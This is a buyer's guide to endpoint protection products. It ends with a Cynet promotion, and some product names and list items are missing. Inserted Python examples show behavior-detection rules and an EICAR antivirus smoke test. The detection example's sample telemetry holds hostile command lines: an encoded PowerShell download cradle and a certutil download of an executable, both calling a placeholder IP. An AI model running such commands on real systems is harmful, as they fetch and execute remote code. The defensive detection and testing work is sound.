Endpoint Protection Platforms (EPP) are essential to defend your organization's workstations, mobile devices, servers and containers. Modern EPPs combine preventive controls, such as Next-Generation Antivirus (NGAV) that blocks both known and unknown malware, with active detection and response capabilities known as Endpoint Detection and Response (EDR).
On this page we explain the criteria for selecting and evaluating EPPs, and review the top 5 EPP solutions, breaking each one down into its preventive and its EDR features.
If you want to learn about Extended Detection and Response (XDR), the next stage in the evolution of EPP and EDR, click here.
EPP solutions include the following features and capabilities:
| Feature | Description |
|---|---|
| Malware protection | Protects against known and unknown malware variants |
| Protection from exploits | Blocks exploitation of zero-day and known software vulnerabilities |
| Email threats protection | Scans email attachments, detects and blocks malicious payloads |
| Downloads protection | Prevents unintentional user downloads of malicious files and drive-by downloads |
| Application Control | Enables whitelisting and blacklisting of applications on the endpoint |
| Behavior Analysis | Monitors endpoint behavior (processes, parent/child relationships, command lines) and uses machine learning techniques to identify suspicious activity |
| Endpoint Detection and Response (EDR) | Provides visibility into security incidents on the endpoint and gives security teams the tools to investigate and respond to them |
| Data Loss Prevention (DLP) | Detects and blocks data theft by insiders and exfiltration attempts by external attackers |
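To make the "Behavior Analysis" row concrete, here is an added illustration (not any vendor's engine, and not code from this page) of the kind of rule an EPP applies to process-creation telemetry: parent/child relationships, living-off-the-land binaries (LOLBins) and decoded PowerShell command lines. The events, the rule names and the 203.0.113.7 address are constructed sample data.

```python
# Added illustration of behavior-analysis rules over process telemetry.
# Not a vendor's engine; the events below are constructed sample data.
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcessEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the newly created process
    cmdline: str   # full command line of the new process


# Signed Windows tools that attackers reuse (LOLBins) and that Office
# applications almost never launch legitimately.
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument
    (base64 of UTF-16LE text), or None if the command line has none."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(ev: ProcessEvent) -> List[str]:
    """Return the names of the rules the event matches; [] means allow."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    hits = []
    # Rule 1: parent/child relationship, e.g. a macro launching a script host.
    if parent in OFFICE_APPS and image in LOLBINS:
        hits.append("office_spawns_lolbin")
    # Rule 2: certutil abused as a downloader.
    if image == "certutil.exe" and "-urlcache" in cmd and "http" in cmd:
        hits.append("certutil_download")
    # Rule 3: look inside encoded PowerShell rather than alerting on the
    # encoding alone; alert once the payload shows a download cradle.
    decoded = decode_encoded_command(ev.cmdline) if image == "powershell.exe" else None
    if decoded and ("downloadstring" in decoded.lower() or "iex" in decoded.lower()):
        hits.append("encoded_download_cradle")
    return hits


def _encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "winword.exe", "winword.exe /n report.docx"),
    ProcessEvent("winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc "
                 + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')")),
    ProcessEvent("cmd.exe", "certutil.exe",
                 "certutil.exe -urlcache -split -f http://203.0.113.7/x.exe x.exe"),
    ProcessEvent("services.exe", "powershell.exe",
                 "powershell.exe -File C:\\ProgramData\\Backup\\nightly.ps1"),
]


def triage(events) -> dict:
    """Map each command line to its rule hits; an empty list means allowed."""
    return {ev.cmdline: evaluate(ev) for ev in events}


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS).items():
        print(("ALERT " + ",".join(hits)) if hits else "allow", "::", cmdline[:70])
```

The point of the third rule is the one to check when evaluating a product: a scheduled PowerShell script run from services.exe produces no alert, while the same binary launched by Word with an encoded download cradle trips two independent rules. Vendor demos usually show the latter; ask to see the former stay quiet.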
Operating system support: Windows, Mac, Linux
Prevention features: Next-Generation Antivirus (NGAV) that blocks malware, exploits, LOLBins, macros, malicious scripts and other malicious payloads. Zero-day protection using User and Entity Behavior Analytics (UEBA) to detect and block suspicious activity. Asset management, endpoint vulnerability assessment and application control, with auditing, logging and monitoring. Deception technology lures attackers to a honeypot, gathering intelligence about their techniques. Network analytics identifies lateral movement, suspicious connections and logins.
EDR features: Advanced endpoint threat detection anticipates attacker behavior through continuous monitoring of endpoints and behavioral analysis. Historic and current incident data on endpoints can be searched and reviewed to investigate threats and validate alerts, for faster remediation. Response is either orchestrated automatically or performed manually on the affected endpoints. The vendor claims deployment across thousands of endpoints within two hours.
Operating system support: Windows 7, 8, 10, Windows Server 2012, 2016, 2019, MacOS, Azure, Amazon Workspaces, VMware WS, ESX, ESXi, XenServer, Oracle VirtualBox
Prevention features: Antivirus, firewall and intrusion prevention, application and device control including file, registry and device access, application whitelisting and blacklisting, automated device erasure, enforcing policy on hosts, system lockdown.
EDR features: Symantec Endpoint Protection offers Targeted Attack Analytics (TAA), combining local and global telemetry, machine learning analysis of device behavior and threat intelligence. It assists with attack investigation, containment and resolution.
Operating system support: Windows, Linux, MacOS
Prevention features: Kaspersky Endpoint Security offers mobile threat defense, security policy management, role-based access control (RBAC), adaptive anomaly control, encryption management, vulnerability and exploit prevention, security for web gateways and email servers, ransomware protection, application control, whitelisting and blacklisting, operating system and third-party software installation.
EDR features (EDR offered as separate product):
Operating system support: Windows XP, Vista, 7, 8, 10, Windows Server 2003, 2008, 2012, 2016, 2019, any virtualization platform running these operating systems.
Prevention features: McAfee Endpoint Security offers behavior classification for detecting zero-day threats, adaptive scanning for malware and other threats, a next-gen anti-malware engine, safe browsing with web protection and filtering, ransomware and grayware prevention, and an integrated firewall that blocks network attacks.
Operating system support: Windows, Linux, MacOS, Virtualization
EDR features: Tracks all activity on endpoints, contextualizes and identifies suspicious activity in real time, enables rapid response and rollback to last known good configuration, advanced threat hunting with full context of security incident forensics.
Operating system support: Windows and MacOS
EDR features (EDR offered as separate product):
Don't take vendor claims as a given. Take your EPP solution of choice for a spin before you buy. Try some of these to test EPP capabilities for yourself:
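The simplest vendor-neutral check you can run yourself is the EICAR test file, the industry-standard harmless file that every antivirus engine is expected to detect. The script below is an added example (not code from this page or from any of the vendors above): it writes the file, waits for the product to react, and reports whether the write was blocked, the file was quarantined, or it survived untouched. The EICAR string is assembled from fragments so the script itself is not flagged on disk; the file name and wait time are arbitrary choices.

```python
# Added example: a safe EPP smoke test with the EICAR test file.
# Not vendor code. Run in a user-writable directory on a protected host.
import time
from pathlib import Path
from typing import Optional


def eicar_string() -> str:
    """The 68-byte EICAR standard anti-virus test string, built from
    fragments so this source file does not contain it verbatim."""
    parts = ["X5O!P%@AP[4\\PZX54(P^)7CC)7}",
             "$EICAR-STANDARD-",
             "ANTIVIRUS-TEST-FILE!$",
             "H+H*"]
    s = "".join(parts)
    assert len(s) == 68
    return s


def classify_outcome(write_ok: bool, still_present: bool,
                     content: Optional[bytes]) -> str:
    """Turn the observations into a verdict:
    blocked     - the write itself was refused (on-access block)
    quarantined - the file was removed or made unreadable
    survived    - the file is still there with the original bytes
    altered     - something rewrote the file (e.g. partial cleaning)"""
    if not write_ok:
        return "blocked"
    if not still_present or content is None:
        return "quarantined"
    if content == eicar_string().encode("ascii"):
        return "survived"
    return "altered"


def drop_and_observe(directory: Path, wait_s: float = 5.0) -> str:
    """Write eicar.com into directory, wait up to wait_s seconds for the
    EPP to react, and return the verdict from classify_outcome()."""
    path = directory / "eicar.com"
    try:
        path.write_bytes(eicar_string().encode("ascii"))
    except OSError:            # includes Windows' "file contains a virus" error
        return classify_outcome(False, False, None)
    deadline = time.monotonic() + wait_s
    while path.exists() and time.monotonic() < deadline:
        time.sleep(0.5)
    if not path.exists():
        return classify_outcome(True, False, None)
    try:
        content: Optional[bytes] = path.read_bytes()
    except OSError:            # quarantined between exists() and read
        content = None
    return classify_outcome(True, True, content)


if __name__ == "__main__":
    # "survived" means no on-access scanning acted on this directory;
    # any other verdict means the EPP reacted.
    print(drop_and_observe(Path.cwd()))
```

Two caveats a practitioner should keep in mind. EICAR only exercises the signature-based file-scanning path, so a pass says nothing about the NGAV, exploit-prevention or EDR claims in the product descriptions above; those need behavioral test cases (for example the parent/child and encoded-PowerShell scenarios shown earlier) or a red-team exercise. And a "survived" result in one directory may simply mean that directory is excluded from scanning, so repeat the test in the locations your users actually write to.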
Cynet 360 is a security solution that includes a complete EPP offering (NGAV, device firewall, advanced EDR capabilities and automated incident response) and goes beyond endpoint protection with network analytics, UEBA and deception technology.
Cynet’s platform includes:
Learn more about the Cynet 360 security platform.